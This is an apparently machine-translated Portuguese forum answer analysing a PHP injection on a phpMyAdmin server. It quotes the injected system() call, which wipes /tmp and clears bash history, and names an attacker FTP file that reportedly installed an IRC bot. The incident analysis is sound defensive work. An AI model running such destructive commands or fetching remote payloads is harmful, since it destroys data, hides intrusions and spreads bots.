Nada mal até agora, mas não há como saber ainda.
Olhando para o comentário system suspeito, o comando que ele tenta fazer com que você seja executado parece excluir tudo em /tmp , , mas em nenhum outro lugar . Além disso, o site em suspeita foi retirado pelo provedor de hospedagem, então agora deve haver pouco para se preocupar. Observe que as conexões do MySQL sobre soquetes e serviços falharão até a próxima reinicialização devido à exclusão de arquivos de /tmp , mas nenhum dado deveria ter sido perdido (exceto seu histórico bash).
Eu apenas informava informalmente um desenvolvedor PHPMyAdmin, então, se não é uma falha de segurança que pode ser mal utilizada, um bug não é realmente feito por ele.
Bolded são os bits interessantes de comandos no código grande injetado:
<? system("cd /tmp;rm -rf * ... history -c;");exit?>
Também olhando, há um arquivo, ftp://hawk1156:[email protected]/2.txt que pode ter feito algo ruim, mas como eu não sei o que estava no arquivo, e o provedor de hospedagem derrubou a conta, não há como saiba o que faz, a menos que você consiga ext4undelete para tentar obter um registro dos danos. * Ele pode ter feito algo ruim. * Se você realmente desenterrar o arquivo com um utilitário undelete, poste-o aqui e eu ficarei feliz em examiná-lo.
Edit: Graças ao comentário de janeiro, que eu não notei, o máximo que este ataque parece ter feito é criar um bot de IRC. Se ainda houver perl em execução e você não tiver nenhum serviço crítico executado no PERL, execute:
sudo killall perl
ou reinicie.